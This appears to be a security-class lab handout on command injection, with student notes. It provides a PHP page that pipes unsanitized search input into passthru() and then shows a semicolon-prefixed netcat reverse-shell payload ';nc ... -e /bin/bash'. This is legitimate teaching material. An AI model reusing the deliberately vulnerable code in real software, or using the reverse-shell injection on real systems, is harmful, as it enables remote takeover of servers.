Activity 2.3 - Command Injection Vulnerabilities

Command injection allows a user to enter, prepend or append an executable command to unsanitized input.

Create a new php file called grepper.php with the following contents.

• Adjust the source code as necessary to point to your version of rockyou.txt.

• This application will allow you to search it for dictionary items.

/<form id="logform" method="post">
  <div>
      Search Term: <input type="text" name="search">
  <div>
  <div class="full-width"></br>
      <button type="submit">Search</button>
  </div>
</form>

<?php
if(isset($_POST['search'])) {
  $searchterm=$_POST['search'];
  echo "<div>";
  echo "<h1>Searchterm:" . $searchterm . "</h1>";
  echo "</div>";

  echo "<pre>";
  passthru("cat /home/hanne/sec480/week2/rockyou.txt | grep " . $searchterm);
  echo "</pre>";
}
?>

Make sure to start your php server before testing it in your web browser!

/php -S 127.0.0.1:9000

Deliverable-1: Try the application out and search for a string of interest.

Deliverable-2: Figure out how to run commands of your choosing. Provide a screenshot similar to the one below that shows your application output as well as commands you've snuck in.

To run commands from my search box I simply put in a semi colon before the command!

Challenge: See if you can use this technique to invoke a reverse shell, you can catch it on another local port, alternatively you can work with a partner to exploit their version of grepper and invoke a shell on the remote system.

• Start a netcat listener in another kali tab (you can use any port)

  • make sure to keep your php server running!

Put the following in your search box to create a reverse shell

• make sure to have a semi colon in from of the command!

;nc 10.0.17.83 8000 -e /bin/bash

You should see a connection to your reverse shell back in your terminal and you can execute commands!